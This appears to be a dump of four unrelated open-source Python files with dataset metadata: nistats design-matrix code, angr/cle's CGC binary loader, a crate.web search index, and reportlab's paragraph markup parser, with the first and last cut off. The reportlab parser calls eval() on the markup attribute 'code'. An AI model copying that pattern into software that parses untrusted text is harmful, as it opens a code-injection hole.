np.minimum(n_frames - 1, int(np.floor(2 * n_frames * high_pass * dt))) cosine_drift = np.zeros((n_frames, order + 1)) normalizer = np.sqrt(2.0 / n_frames) for k in range(1, order + 1): cosine_drift[:, k - 1] = normalizer * np.cos( (np.pi / n_frames) * (n_times + .5) * k) cosine_drift[:, -1] = 1. 
return cosine_drift def _none_drift(frame_times): """ Create an intercept vector Returns ------- np.ones_like(frame_times) """ return np.reshape(np.ones_like(frame_times), (np.size(frame_times), 1)) def _make_drift(drift_model, frame_times, order, high_pass): """Create the drift matrix Parameters ---------- drift_model : {'polynomial', 'cosine', None}, string that specifies the desired drift model frame_times : array of shape(n_scans), list of values representing the desired TRs order : int, optional, order of the drift model (in case it is polynomial) high_pass : float, optional, high-pass frequency in case of a cosine model (in Hz) Returns ------- drift : array of shape(n_scans, n_drifts), the drift matrix names : list of length(n_drifts), the associated names """ if isinstance(drift_model, _basestring): drift_model = drift_model.lower() # for robust comparisons if drift_model == 'polynomial': drift = _poly_drift(order, frame_times) elif drift_model == 'cosine': drift = _cosine_drift(high_pass, frame_times) elif drift_model is None: drift = _none_drift(frame_times) else: raise NotImplementedError("Unknown drift model %r" % (drift_model)) names = [] for k in range(1, drift.shape[1]): names.append('drift_%d' % k) names.append('constant') return drift, names def _convolve_regressors(events, hrf_model, frame_times, fir_delays=[0], min_onset=-24, oversampling=50): """ Creation of a matrix that comprises the convolution of the conditions onset with a certain hrf model Parameters ---------- events : DataFrame instance, Events data describing the experimental paradigm see nistats.experimental_paradigm to check the specification for these to be valid paradigm descriptors hrf_model : {'spm', 'spm + derivative', 'spm + derivative + dispersion', 'glover', 'glover + derivative', 'glover + derivative + dispersion', 'fir', None} String that specifies the hemodynamic response function frame_times : array of shape (n_scans,) The targeted timing for the design matrix. fir_delays : array-like of shape (n_onsets,), optional, In case of FIR design, yields the array of delays used in the FIR model (in scans). min_onset : float, optional (default: -24), Minimal onset relative to frame_times[0] (in seconds) events that start before frame_times[0] + min_onset are not considered. oversampling: int optional, default:50, Oversampling factor used in temporal convolutions. Returns ------- regressor_matrix : array of shape (n_scans, n_regressors), Contains the convolved regressors associated with the experimental conditions. regressor_names : list of strings, The regressor names, that depend on the hrf model used if 'glover' or 'spm' then this is identical to the input names if 'glover + derivative' or 'spm + derivative', a second name is output i.e. '#name_derivative' if 'spm + derivative + dispersion' or 'glover + derivative + dispersion', a third name is used, i.e. 
'#name_dispersion'
        if 'fir', the regressors are numbered according to '#name_#delay'
    """
    regressor_names = []
    regressor_matrix = None
    trial_type, onset, duration, modulation = check_events(events)
    for condition in np.unique(trial_type):
        condition_mask = (trial_type == condition)
        exp_condition = (onset[condition_mask],
                         duration[condition_mask],
                         modulation[condition_mask])
        reg, names = compute_regressor(
            exp_condition, hrf_model, frame_times, con_id=condition,
            fir_delays=fir_delays, oversampling=oversampling,
            min_onset=min_onset)
        regressor_names += names
        if regressor_matrix is None:
            regressor_matrix = reg
        else:
            regressor_matrix = np.hstack((regressor_matrix, reg))
    return regressor_matrix, regressor_names


######################################################################
# Design matrix creation
######################################################################


def make_first_level_design_matrix(
        frame_times, events=None, hrf_model='glover',
        drift_model='cosine', high_pass=.01, drift_order=1, fir_delays=[0],
        add_regs=None, add_reg_names=None, min_onset=-24, oversampling=50):
    """Generate a design matrix from the input parameters

    Parameters
    ----------
    frame_times : array of shape (n_frames,)
        The timing of acquisition of the scans in seconds.

    events : DataFrame instance, optional
        Events data that describes the experimental paradigm.
        The DataFrame instance might have these keys:
            'onset': column to specify the start time of each event in
                seconds. An error is raised if this key is missing.
            'trial_type': column to specify per-event experimental conditions
                identifier. If missing, each event is labelled 'dummy' and
                considered to form a unique condition.
            'duration': column to specify the duration of each event in
                seconds. If missing, the duration of each event is set to
                zero.
            'modulation': column to specify the amplitude of each event.
                If missing, the default is set to ones(n_events).

        An experimental paradigm is valid if it has an 'onset' key
        and a 'duration' key.
        If these keys are missing an error will be raised.
        For the other keys a warning will be displayed.
        Particular attention should be given to the 'trial_type' key
        which defines the different conditions in the experimental paradigm.

    hrf_model : {'spm', 'spm + derivative', 'spm + derivative + dispersion',
        'glover', 'glover + derivative', 'glover + derivative + dispersion',
        'fir', None}, optional,
        Specifies the hemodynamic response function.

    drift_model : {'polynomial', 'cosine', None}, optional
        Specifies the desired drift model.

    high_pass : float, optional
        High-pass frequency of the filter in Hz.
        Used only if drift_model is 'cosine'.

    drift_order : int, optional
        Order of the drift model (in case it is polynomial).

    fir_delays : array of shape(n_onsets) or list, optional,
        In case of FIR design, yields the array of delays used in the FIR
        model (in scans).

    add_regs : array of shape(n_frames, n_add_reg), optional
        additional user-supplied regressors, e.g. data driven noise regressors
        or seed based regressors.

    add_reg_names : list of (n_add_reg,) strings, optional
        If None, while add_regs was provided, these will be termed
        'reg_%i', i = 0..n_add_reg - 1

    min_onset : float, optional
        Minimal onset relative to frame_times[0] (in seconds); events
        that start before frame_times[0] + min_onset are not considered.

    oversampling : int, optional,
        Oversampling factor used in temporal convolutions.

    Returns
    -------
    design_matrix : DataFrame instance,
        holding the computed design matrix, the index being the
        frame_times and each column a regressor.
""" # check arguments # check that additional regressor specification is correct n_add_regs = 0 if add_regs is not None: if add_regs.shape[0] == np.size(add_regs): add_regs = np.reshape(add_regs, (np.size(add_regs), 1)) n_add_regs = add_regs.shape[1] assert add_regs.shape[0] == np.size(frame_times), ValueError( 'Incorrect specification of additional regressors: ' 'length of regressors provided: %d, number of ' 'time-frames: %d' % (add_regs.shape[0], np.size(frame_times))) # check that additional regressor names are well specified if add_reg_names is None: add_reg_names = ['reg%d' % k for k in range(n_add_regs)] elif len(add_reg_names) != n_add_regs: raise ValueError( 'Incorrect number of additional regressor names was provided' '(%d provided, %d expected' % (len(add_reg_names), n_add_regs)) # computation of the matrix names = [] matrix = None # step 1: events-related regressors if events is not None: # create the condition-related regressors if isinstance(hrf_model, _basestring): hrf_model = hrf_model.lower() matrix, names = _convolve_regressors( events, hrf_model, frame_times, fir_delays, min_onset, oversampling) # step 2: additional regressors if add_regs is not None: # add user-supplied regressors and corresponding names if matrix is not None: matrix = np.hstack((matrix, add_regs)) else: matrix = add_regs names += add_reg_names # step 3: drifts drift, dnames = _make_drift(drift_model, frame_times, drift_order, high_pass) if matrix is not None: matrix = np.hstack((matrix, drift)) else: matrix = drift names += dnames # check column names are all unique if len(np.unique(names)) != len(names): raise ValueError('Design matrix columns do not have unique names') # step 4: Force the design matrix to be full rank at working precision matrix, _ = full_rank(matrix) design_matrix = pd.DataFrame( matrix, columns=names, index=frame_times) return design_matrix def check_design_matrix(design_matrix): """ Check that the provided DataFrame is indeed a valid design matrix descriptor, and returns a triplet of fields Parameters ---------- design matrix : pandas DataFrame, Describes a design matrix. Returns ------- frame_times : array of shape (n_frames,), Sampling times of the design matrix in seconds. matrix : array of shape (n_frames, n_regressors), dtype='f' Numerical values for the design matrix. names : array of shape (n_events,), dtype='f' Per-event onset time (in seconds) """ names = [name for name in design_matrix.keys()] frame_times = design_matrix.index matrix = design_matrix.values return frame_times, matrix, names def make_second_level_design_matrix(subjects_label, confounds=None): """Sets up a second level design. Construct a design matrix with an intercept and subject specific confounds. Parameters ---------- subjects_label: list of str Contain subject labels to extract confounders in the right order, corresponding with the images, to create the design matrix. confounds: pandas DataFrame, optional If given, contains at least two columns, 'subject_label' and one confound. The subjects list determines the rows to extract from confounds thanks to its 'subject_label' column. All subjects must have confounds specified. There should be only one row per subject. 
Returns ------- design_matrix: pandas DataFrame The second level design matrix """ confounds_name = [] if confounds is not None: confounds_name = confounds.columns.tolist() confounds_name.remove('subject_label') design_columns = (confounds_name + ['intercept']) # check column names are unique if len(np.unique(design_columns)) != len(design_columns): raise ValueError('Design matrix columns do not have unique names') # float dtype necessary for linalg design_matrix = pd.DataFrame(columns=design_columns, dtype=float) for ridx, subject_label in enumerate(subjects_label): design_matrix.loc[ridx] = [0] * len(design_columns) design_matrix.loc[ridx, 'intercept'] = 1 if confounds is not None: conrow = confounds['subject_label'] == subject_label if np.sum(conrow) > 1: raise ValueError('confounds contain more than one row for ' 'subject %s' % subject_label) elif np.sum(conrow) == 0: raise ValueError('confounds not specified for subject %s' % subject_label) for conf_name in confounds_name: confounds_value = confounds[conrow][conf_name].values[0] design_matrix.loc[ridx, conf_name] = confounds_value # check design matrix is not singular sys.float_info.epsilon if np.linalg.cond(design_matrix.values) > design_matrix.size: warn('Attention: Design matrix is singular. Aberrant estimates ' 'are expected.') return design_matrix
bsd-3-clause
-7,965,344,307,184,148,000
35.963203
79
0.624758
false
4.033302
false
false
false
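The cosine drift basis built by _cosine_drift in the record above is the standard DCT-II set: the k-th regressor is sqrt(2/N) * cos(pi/N * (t + 0.5) * k). A self-contained numpy sketch of the same construction follows; the scan parameters are made-up values for illustration.

import numpy as np

n_frames, t_r, high_pass = 128, 2.0, 0.01   # made-up scan parameters
frame_times = np.arange(n_frames) * t_r
dt = (frame_times[-1] - frame_times[0]) / (n_frames - 1)

# number of cosines needed to cover frequencies up to high_pass
order = min(n_frames - 1, int(np.floor(2 * n_frames * high_pass * dt)))
drift = np.zeros((n_frames, order + 1))
n_times = np.arange(n_frames)
for k in range(1, order + 1):
    drift[:, k - 1] = np.sqrt(2.0 / n_frames) * np.cos(
        (np.pi / n_frames) * (n_times + .5) * k)
drift[:, -1] = 1.            # constant regressor, as in _cosine_drift
print(drift.shape)           # (128, 6) with these values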
angr/cle
cle/backends/cgc/cgc.py
1
1352
from ...address_translator import AT from .. import register_backend from ..elf import ELF from ...patched_stream import PatchedStream ELF_HEADER = bytes.fromhex("7f454c46010101000000000000000000") CGC_HEADER = bytes.fromhex("7f43474301010143014d6572696e6f00") class CGC(ELF): """ Backend to support the CGC elf format used by the Cyber Grand Challenge competition. See : https://github.com/CyberGrandChallenge/libcgcef/blob/master/cgc_executable_format.md """ is_default = True # Tell CLE to automatically consider using the CGC backend def __init__(self, binary, binary_stream, *args, **kwargs): binary_stream = PatchedStream(binary_stream, [(0, ELF_HEADER)]) super().__init__(binary, binary_stream, *args, **kwargs) self.memory.store(AT.from_raw(0, self).to_rva(), CGC_HEADER) # repair the CGC header self.os = 'cgc' self.execstack = True # the stack is always executable in CGC @staticmethod def is_compatible(stream): stream.seek(0) identstring = stream.read(4) stream.seek(0) if identstring.startswith(b'\x7fCGC'): return True return False def _load_segment(self, seg): if seg.header.p_memsz > 0: super()._load_segment(seg) supported_filetypes = ['cgc'] register_backend('cgc', CGC)
bsd-2-clause
-3,029,612,784,850,716,000
32.8
94
0.664201
false
3.414141
false
false
false
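The CGC backend above works by swapping a 16-byte magic header, so is_compatible only has to peek at the first four bytes of the stream. A minimal sketch of that detection on a raw byte stream; the sample headers are fabricated for illustration.

import io

CGC_MAGIC = b'\x7fCGC'

def looks_like_cgc(stream):
    # mirror CGC.is_compatible: rewind, read 4 bytes, rewind again
    stream.seek(0)
    ident = stream.read(4)
    stream.seek(0)
    return ident.startswith(CGC_MAGIC)

fake_cgc = io.BytesIO(b'\x7fCGC\x01\x01\x01C' + b'\x00' * 8)  # made-up header
fake_elf = io.BytesIO(b'\x7fELF' + b'\x00' * 12)
print(looks_like_cgc(fake_cgc), looks_like_cgc(fake_elf))  # True False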
crateio/crate.web
crate/web/search/indexes.py
1
2307
from django.db.models import signals from celery_haystack.indexes import CelerySearchIndex as BaseCelerySearchIndex from crate.web.packages.models import Package, Release, ReleaseFile class PackageCelerySearchIndex(BaseCelerySearchIndex): # We override the built-in _setup_* methods to connect the enqueuing # operation. def _setup_save(self, model=None): model = self.handle_model(model) signals.post_save.connect(self.enqueue_save, sender=model) signals.post_save.connect(self.enqueue_save_from_release, sender=Release) signals.post_save.connect(self.enqueue_save_from_releasefile, sender=ReleaseFile) def _setup_delete(self, model=None): model = self.handle_model(model) signals.post_delete.connect(self.enqueue_delete, sender=model) signals.post_delete.connect(self.enqueue_delete_from_release, sender=Release) signals.post_delete.connect(self.enqueue_delete_from_releasefile, sender=ReleaseFile) def _teardown_save(self, model=None): model = self.handle_model(model) signals.post_save.disconnect(self.enqueue_save, sender=model) signals.post_save.disconnect(self.enqueue_save_from_release, sender=Release) signals.post_save.disconnect(self.enqueue_save_from_releasefile, sender=ReleaseFile) def _teardown_delete(self, model=None): model = self.handle_model(model) signals.post_delete.disconnect(self.enqueue_delete, sender=model) signals.post_delete.disconnect(self.enqueue_delete_from_release, sender=Release) signals.post_delete.disconnect(self.enqueue_delete_from_releasefile, sender=ReleaseFile) def enqueue_save_from_release(self, instance, **kwargs): return self.enqueue('update', instance.package) def enqueue_delete_from_release(self, instance, **kwargs): try: return self.enqueue('update', instance.package) except Package.DoesNotExist: pass def enqueue_save_from_releasefile(self, instance, **kwargs): return self.enqueue('update', instance.release.package) def enqueue_delete_from_releasefile(self, instance, **kwargs): try: return self.enqueue('update', instance.release.package) except Release.DoesNotExist: pass
bsd-2-clause
6,856,013,931,906,348,000
43.365385
96
0.714781
false
3.890388
false
false
false
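The index in the record above fans signals from Release and ReleaseFile back to the parent Package. The dispatch pattern itself is independent of Django; here is a toy sketch with a hand-rolled signal, where every name is invented for illustration.

class Signal(object):
    # minimal stand-in for django.db.models.signals.post_save
    def __init__(self):
        self._receivers = []
    def connect(self, handler, sender):
        self._receivers.append((sender, handler))
    def send(self, instance):
        for sender, handler in self._receivers:
            if isinstance(instance, sender):
                handler(instance)

class Release(object):
    def __init__(self, package):
        self.package = package

post_save = Signal()
# route a Release save to an update of its parent package,
# analogous to enqueue_save_from_release
post_save.connect(lambda rel: print("update %s" % rel.package), Release)
post_save.send(Release("crate"))   # prints: update crate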
makinacorpus/reportlab-ecomobile
src/reportlab/platypus/paraparser.py
1
37402
#Copyright ReportLab Europe Ltd. 2000-2004 #see license.txt for license details #history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/platypus/paraparser.py __version__=''' $Id$ ''' __doc__='''The parser used to process markup within paragraphs''' import string import re from types import TupleType, UnicodeType, StringType import sys import os import copy import unicodedata import reportlab.lib.sequencer from reportlab.lib.abag import ABag from reportlab.lib.utils import ImageReader from reportlab.lib import xmllib from reportlab.lib.colors import toColor, white, black, red, Color from reportlab.lib.fonts import tt2ps, ps2tt from reportlab.lib.enums import TA_LEFT, TA_RIGHT, TA_CENTER, TA_JUSTIFY from reportlab.lib.units import inch,mm,cm,pica _re_para = re.compile(r'^\s*<\s*para(?:\s+|>|/>)') sizeDelta = 2 # amount to reduce font size by for super and sub script subFraction = 0.5 # fraction of font size that a sub script should be lowered superFraction = 0.5 # fraction of font size that a super script should be raised def _convnum(s, unit=1): if s[0] in ['+','-']: try: return ('relative',int(s)*unit) except ValueError: return ('relative',float(s)*unit) else: try: return int(s)*unit except ValueError: return float(s)*unit def _num(s, unit=1): """Convert a string like '10cm' to an int or float (in points). The default unit is point, but optionally you can use other default units like mm. """ if s[-2:]=='cm': unit=cm s = s[:-2] if s[-2:]=='in': unit=inch s = s[:-2] if s[-2:]=='pt': unit=1 s = s[:-2] if s[-1:]=='i': unit=inch s = s[:-1] if s[-2:]=='mm': unit=mm s = s[:-2] if s[-4:]=='pica': unit=pica s = s[:-4] return _convnum(s,unit) class _PCT: def __init__(self,v): self._value = v*0.01 def normalizedValue(self,normalizer): return normalizer*self._value def _valignpc(s): s = s.lower() if s in ('baseline','sub','super','top','text-top','middle','bottom','text-bottom'): return s if s.endswith('%'): n = _convnum(s[:-1]) if isinstance(n,tuple): n = n[1] return _PCT(n) n = _num(s) if isinstance(n,tuple): n = n[1] return n def _autoLeading(x): x = x.lower() if x in ('','min','max','off'): return x raise ValueError('Invalid autoLeading=%r' % x ) def _align(s): s = string.lower(s) if s=='left': return TA_LEFT elif s=='right': return TA_RIGHT elif s=='justify': return TA_JUSTIFY elif s in ('centre','center'): return TA_CENTER else: raise ValueError _paraAttrMap = {'font': ('fontName', None), 'face': ('fontName', None), 'fontsize': ('fontSize', _num), 'size': ('fontSize', _num), 'leading': ('leading', _num), 'autoleading': ('autoLeading', _autoLeading), 'lindent': ('leftIndent', _num), 'rindent': ('rightIndent', _num), 'findent': ('firstLineIndent', _num), 'align': ('alignment', _align), 'spaceb': ('spaceBefore', _num), 'spacea': ('spaceAfter', _num), 'bfont': ('bulletFontName', None), 'bfontsize': ('bulletFontSize',_num), 'boffsety': ('bulletOffsetY',_num), 'bindent': ('bulletIndent',_num), 'bcolor': ('bulletColor',toColor), 'color':('textColor',toColor), 'backcolor':('backColor',toColor), 'bgcolor':('backColor',toColor), 'bg':('backColor',toColor), 'fg': ('textColor',toColor), } _bulletAttrMap = { 'font': ('bulletFontName', None), 'face': ('bulletFontName', None), 'size': ('bulletFontSize',_num), 'fontsize': ('bulletFontSize',_num), 'offsety': ('bulletOffsetY',_num), 'indent': ('bulletIndent',_num), 'color': ('bulletColor',toColor), 'fg': ('bulletColor',toColor), } #things which are valid font attributes _fontAttrMap = {'size': ('fontSize', _num), 'face': 
('fontName', None), 'name': ('fontName', None), 'fg': ('textColor', toColor), 'color':('textColor', toColor), 'backcolor':('backColor',toColor), 'bgcolor':('backColor',toColor), } #things which are valid font attributes _linkAttrMap = {'size': ('fontSize', _num), 'face': ('fontName', None), 'name': ('fontName', None), 'fg': ('textColor', toColor), 'color':('textColor', toColor), 'backcolor':('backColor',toColor), 'bgcolor':('backColor',toColor), 'dest': ('link', None), 'destination': ('link', None), 'target': ('link', None), 'href': ('link', None), } _anchorAttrMap = {'fontSize': ('fontSize', _num), 'fontName': ('fontName', None), 'name': ('name', None), 'fg': ('textColor', toColor), 'color':('textColor', toColor), 'backcolor':('backColor',toColor), 'bgcolor':('backColor',toColor), 'href': ('href', None), } _imgAttrMap = { 'src': ('src', None), 'width': ('width',_num), 'height':('height',_num), 'valign':('valign',_valignpc), } def _addAttributeNames(m): K = m.keys() for k in K: n = m[k][0] if not m.has_key(n): m[n] = m[k] n = string.lower(n) if not m.has_key(n): m[n] = m[k] _addAttributeNames(_paraAttrMap) _addAttributeNames(_fontAttrMap) _addAttributeNames(_bulletAttrMap) _addAttributeNames(_anchorAttrMap) _addAttributeNames(_linkAttrMap) def _applyAttributes(obj, attr): for k, v in attr.items(): if type(v) is TupleType and v[0]=='relative': #AR 20/5/2000 - remove 1.5.2-ism #v = v[1]+getattr(obj,k,0) if hasattr(obj, k): v = v[1]+getattr(obj,k) else: v = v[1] setattr(obj,k,v) #Named character entities intended to be supported from the special font #with additions suggested by Christoph Zwerschke who also suggested the #numeric entity names that follow. greeks = { 'pound': '\xc2\xa3', 'nbsp': '\xc2\xa0', 'alefsym': '\xe2\x84\xb5', 'Alpha': '\xce\x91', 'alpha': '\xce\xb1', 'and': '\xe2\x88\xa7', 'ang': '\xe2\x88\xa0', 'asymp': '\xe2\x89\x88', 'Beta': '\xce\x92', 'beta': '\xce\xb2', 'bull': '\xe2\x80\xa2', 'cap': '\xe2\x88\xa9', 'Chi': '\xce\xa7', 'chi': '\xcf\x87', 'clubs': '\xe2\x99\xa3', 'cong': '\xe2\x89\x85', 'cup': '\xe2\x88\xaa', 'darr': '\xe2\x86\x93', 'dArr': '\xe2\x87\x93', 'delta': '\xce\xb4', 'Delta': '\xe2\x88\x86', 'diams': '\xe2\x99\xa6', 'empty': '\xe2\x88\x85', 'Epsilon': '\xce\x95', 'epsilon': '\xce\xb5', 'epsiv': '\xce\xb5', 'equiv': '\xe2\x89\xa1', 'Eta': '\xce\x97', 'eta': '\xce\xb7', 'euro': '\xe2\x82\xac', 'exist': '\xe2\x88\x83', 'forall': '\xe2\x88\x80', 'frasl': '\xe2\x81\x84', 'Gamma': '\xce\x93', 'gamma': '\xce\xb3', 'ge': '\xe2\x89\xa5', 'harr': '\xe2\x86\x94', 'hArr': '\xe2\x87\x94', 'hearts': '\xe2\x99\xa5', 'hellip': '\xe2\x80\xa6', 'image': '\xe2\x84\x91', 'infin': '\xe2\x88\x9e', 'int': '\xe2\x88\xab', 'Iota': '\xce\x99', 'iota': '\xce\xb9', 'isin': '\xe2\x88\x88', 'Kappa': '\xce\x9a', 'kappa': '\xce\xba', 'Lambda': '\xce\x9b', 'lambda': '\xce\xbb', 'lang': '\xe2\x8c\xa9', 'larr': '\xe2\x86\x90', 'lArr': '\xe2\x87\x90', 'lceil': '\xef\xa3\xae', 'le': '\xe2\x89\xa4', 'lfloor': '\xef\xa3\xb0', 'lowast': '\xe2\x88\x97', 'loz': '\xe2\x97\x8a', 'minus': '\xe2\x88\x92', 'mu': '\xc2\xb5', 'Mu': '\xce\x9c', 'nabla': '\xe2\x88\x87', 'ne': '\xe2\x89\xa0', 'ni': '\xe2\x88\x8b', 'notin': '\xe2\x88\x89', 'nsub': '\xe2\x8a\x84', 'Nu': '\xce\x9d', 'nu': '\xce\xbd', 'oline': '\xef\xa3\xa5', 'omega': '\xcf\x89', 'Omega': '\xe2\x84\xa6', 'Omicron': '\xce\x9f', 'omicron': '\xce\xbf', 'oplus': '\xe2\x8a\x95', 'or': '\xe2\x88\xa8', 'otimes': '\xe2\x8a\x97', 'part': '\xe2\x88\x82', 'perp': '\xe2\x8a\xa5', 'Phi': '\xce\xa6', 'phi': '\xcf\x95', 'phis': '\xcf\x86', 'Pi': '\xce\xa0', 
'pi': '\xcf\x80', 'piv': '\xcf\x96', 'prime': '\xe2\x80\xb2', 'prod': '\xe2\x88\x8f', 'prop': '\xe2\x88\x9d', 'Psi': '\xce\xa8', 'psi': '\xcf\x88', 'radic': '\xe2\x88\x9a', 'rang': '\xe2\x8c\xaa', 'rarr': '\xe2\x86\x92', 'rArr': '\xe2\x87\x92', 'rceil': '\xef\xa3\xb9', 'real': '\xe2\x84\x9c', 'rfloor': '\xef\xa3\xbb', 'Rho': '\xce\xa1', 'rho': '\xcf\x81', 'sdot': '\xe2\x8b\x85', 'Sigma': '\xce\xa3', 'sigma': '\xcf\x83', 'sigmaf': '\xcf\x82', 'sigmav': '\xcf\x82', 'sim': '\xe2\x88\xbc', 'spades': '\xe2\x99\xa0', 'sub': '\xe2\x8a\x82', 'sube': '\xe2\x8a\x86', 'sum': '\xe2\x88\x91', 'sup': '\xe2\x8a\x83', 'supe': '\xe2\x8a\x87', 'Tau': '\xce\xa4', 'tau': '\xcf\x84', 'there4': '\xe2\x88\xb4', 'Theta': '\xce\x98', 'theta': '\xce\xb8', 'thetasym': '\xcf\x91', 'thetav': '\xcf\x91', 'trade': '\xef\xa3\xaa', 'uarr': '\xe2\x86\x91', 'uArr': '\xe2\x87\x91', 'upsih': '\xcf\x92', 'Upsilon': '\xce\xa5', 'upsilon': '\xcf\x85', 'weierp': '\xe2\x84\x98', 'Xi': '\xce\x9e', 'xi': '\xce\xbe', 'Zeta': '\xce\x96', 'zeta': '\xce\xb6', } #------------------------------------------------------------------------ class ParaFrag(ABag): """class ParaFrag contains the intermediate representation of string segments as they are being parsed by the XMLParser. fontname, fontSize, rise, textColor, cbDefn """ _greek2Utf8=None def _greekConvert(data): global _greek2Utf8 if not _greek2Utf8: from reportlab.pdfbase.rl_codecs import RL_Codecs import codecs dm = decoding_map = codecs.make_identity_dict(xrange(32,256)) for k in xrange(0,32): dm[k] = None dm.update(RL_Codecs._RL_Codecs__rl_codecs_data['symbol'][0]) _greek2Utf8 = {} for k,v in dm.iteritems(): if not v: u = '\0' else: u = unichr(v).encode('utf8') _greek2Utf8[chr(k)] = u return ''.join(map(_greek2Utf8.__getitem__,data)) #------------------------------------------------------------------ # !!! NOTE !!! THIS TEXT IS NOW REPLICATED IN PARAGRAPH.PY !!! # The ParaFormatter will be able to format the following # tags: # < /b > - bold # < /i > - italics # < u > < /u > - underline # < strike > < /strike > - strike through # < super > < /super > - superscript # < sup > < /sup > - superscript # < sub > < /sub > - subscript # <font name=fontfamily/fontname color=colorname size=float> # < bullet > </bullet> - bullet text (at head of para only) # <onDraw name=callable label="a label"> # <link>link text</link> # attributes of links # size/fontSize=num # name/face/fontName=name # fg/textColor/color=color # backcolor/backColor/bgcolor=color # dest/destination/target/href/link=target # <a>anchor text</a> # attributes of anchors # fontSize=num # fontName=name # fg/textColor/color=color # backcolor/backColor/bgcolor=color # href=href # <a name="anchorpoint"/> # <unichar name="unicode character name"/> # <unichar value="unicode code point"/> # <img src="path" width="1in" height="1in" valign="bottom"/> # <greek> - </greek> # # The whole may be surrounded by <para> </para> tags # # It will also be able to handle any MathML specified Greek characters. #------------------------------------------------------------------ class ParaParser(xmllib.XMLParser): #---------------------------------------------------------- # First we will define all of the xml tag handler functions. # # start_<tag>(attributes) # end_<tag>() # # While parsing the xml ParaFormatter will call these # functions to handle the string formatting tags. # At the start of each tag the corresponding field will # be set to 1 and at the end tag the corresponding field will # be set to 0. 
Then when handle_data is called the options # for that data will be aparent by the current settings. #---------------------------------------------------------- def __getattr__( self, attrName ): """This way we can handle <TAG> the same way as <tag> (ignoring case).""" if attrName!=attrName.lower() and attrName!="caseSensitive" and not self.caseSensitive and \ (attrName.startswith("start_") or attrName.startswith("end_")): return getattr(self,attrName.lower()) raise AttributeError, attrName #### bold def start_b( self, attributes ): self._push(bold=1) def end_b( self ): self._pop(bold=1) def start_strong( self, attributes ): self._push(bold=1) def end_strong( self ): self._pop(bold=1) #### italics def start_i( self, attributes ): self._push(italic=1) def end_i( self ): self._pop(italic=1) def start_em( self, attributes ): self._push(italic=1) def end_em( self ): self._pop(italic=1) #### underline def start_u( self, attributes ): self._push(underline=1) def end_u( self ): self._pop(underline=1) #### strike def start_strike( self, attributes ): self._push(strike=1) def end_strike( self ): self._pop(strike=1) #### link def start_link(self, attributes): self._push(**self.getAttributes(attributes,_linkAttrMap)) def end_link(self): frag = self._stack[-1] del self._stack[-1] assert frag.link!=None #### anchor def start_a(self, attributes): A = self.getAttributes(attributes,_anchorAttrMap) name = A.get('name',None) if name is not None: name = name.strip() if not name: self._syntax_error('<a name="..."/> anchor variant requires non-blank name') if len(A)>1: self._syntax_error('<a name="..."/> anchor variant only allows name attribute') A = dict(name=A['name']) A['_selfClosingTag'] = 'anchor' else: href = A.get('href','').strip() if not href: self._syntax_error('<a> tag must have non-blank name or href attribute') A['link'] = href #convert to our link form A.pop('href') self._push(**A) def end_a(self): frag = self._stack[-1] sct = getattr(frag,'_selfClosingTag','') if sct: assert sct=='anchor' and frag.name,'Parser failure in <a/>' defn = frag.cbDefn = ABag() defn.label = defn.kind = 'anchor' defn.name = frag.name del frag.name, frag._selfClosingTag self.handle_data('') self._pop() else: del self._stack[-1] assert frag.link!=None def start_img(self,attributes): A = self.getAttributes(attributes,_imgAttrMap) if not A.get('src'): self._syntax_error('<img> needs src attribute') A['_selfClosingTag'] = 'img' self._push(**A) def end_img(self): frag = self._stack[-1] assert getattr(frag,'_selfClosingTag',''),'Parser failure in <img/>' defn = frag.cbDefn = ABag() defn.kind = 'img' defn.src = getattr(frag,'src',None) defn.image = ImageReader(defn.src) size = defn.image.getSize() defn.width = getattr(frag,'width',size[0]) defn.height = getattr(frag,'height',size[1]) defn.valign = getattr(frag,'valign','bottom') del frag._selfClosingTag self.handle_data('') self._pop() #### super script def start_super( self, attributes ): self._push(super=1) def end_super( self ): self._pop(super=1) start_sup = start_super end_sup = end_super #### sub script def start_sub( self, attributes ): self._push(sub=1) def end_sub( self ): self._pop(sub=1) #### greek script #### add symbol encoding def handle_charref(self, name): try: if name[0]=='x': n = int(name[1:],16) else: n = int(name) except ValueError: self.unknown_charref(name) return self.handle_data(unichr(n).encode('utf8')) def handle_entityref(self,name): if greeks.has_key(name): self.handle_data(greeks[name]) else: xmllib.XMLParser.handle_entityref(self,name) def 
syntax_error(self,lineno,message): self._syntax_error(message) def _syntax_error(self,message): if message[:10]=="attribute " and message[-17:]==" value not quoted": return self.errors.append(message) def start_greek(self, attr): self._push(greek=1) def end_greek(self): self._pop(greek=1) def start_unichar(self, attr): if attr.has_key('name'): if attr.has_key('code'): self._syntax_error('<unichar/> invalid with both name and code attributes') try: v = unicodedata.lookup(attr['name']).encode('utf8') except KeyError: self._syntax_error('<unichar/> invalid name attribute\n"%s"' % name) v = '\0' elif attr.has_key('code'): try: v = unichr(int(eval(attr['code']))).encode('utf8') except: self._syntax_error('<unichar/> invalid code attribute %s' % attr['code']) v = '\0' else: v = None if attr: self._syntax_error('<unichar/> invalid attribute %s' % attr.keys()[0]) if v is not None: self.handle_data(v) self._push(_selfClosingTag='unichar') def end_unichar(self): self._pop() def start_font(self,attr): self._push(**self.getAttributes(attr,_fontAttrMap)) def end_font(self): self._pop() def start_br(self, attr): #just do the trick to make sure there is no content self._push(_selfClosingTag='br',lineBreak=True,text='') def end_br(self): frag = self._stack[-1] assert frag._selfClosingTag=='br' and frag.lineBreak,'Parser failure in <br/>' del frag._selfClosingTag self.handle_data('') self._pop() def _initial_frag(self,attr,attrMap,bullet=0): style = self._style if attr!={}: style = copy.deepcopy(style) _applyAttributes(style,self.getAttributes(attr,attrMap)) self._style = style # initialize semantic values frag = ParaFrag() frag.sub = 0 frag.super = 0 frag.rise = 0 frag.underline = 0 frag.strike = 0 frag.greek = 0 frag.link = None if bullet: frag.fontName, frag.bold, frag.italic = ps2tt(style.bulletFontName) frag.fontSize = style.bulletFontSize frag.textColor = hasattr(style,'bulletColor') and style.bulletColor or style.textColor else: frag.fontName, frag.bold, frag.italic = ps2tt(style.fontName) frag.fontSize = style.fontSize frag.textColor = style.textColor return frag def start_para(self,attr): self._stack = [self._initial_frag(attr,_paraAttrMap)] def end_para(self): self._pop() def start_bullet(self,attr): if hasattr(self,'bFragList'): self._syntax_error('only one <bullet> tag allowed') self.bFragList = [] frag = self._initial_frag(attr,_bulletAttrMap,1) frag.isBullet = 1 self._stack.append(frag) def end_bullet(self): self._pop() #--------------------------------------------------------------- def start_seqdefault(self, attr): try: default = attr['id'] except KeyError: default = None self._seq.setDefaultCounter(default) def 